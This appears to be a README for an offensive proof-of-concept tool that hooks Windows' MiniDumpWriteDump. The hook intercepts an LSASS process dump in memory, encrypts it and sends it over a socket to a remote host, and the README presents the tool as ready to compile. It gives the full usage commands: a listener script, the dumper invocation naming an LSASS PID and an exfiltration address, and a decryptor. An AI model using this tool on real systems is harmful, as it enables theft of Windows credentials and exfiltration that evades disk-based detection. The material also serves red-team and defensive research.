MiniDumpWriteDump behavior modification hook
Read the full article in our blog: Adepts Of 0xCC: Hooks On Hoot Off
This is a function hook that allows to access the buffer generated by MiniDumpWriteDump before it gets to disk.
Once accessed, it will encrypt the buffer and send it through a socket to a given host.
A full VS solution is provided. Just compile it.
First, set up the server to listen on the receiving host:
python3 serv.py <PORT> python3 serv.py 1234
.\minidumppoc.exe <LSASS_PID> <WRITE_TO_FILE 0|1> <EXFIL 0|1> [<HOST> <PORT>] [<EXPORT_PATH>] minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp"
Once the whole file is received, close the server, and use the dummy decryptor:
python3 dec.py woot.dmp woot_decrypted.dmp 0xb0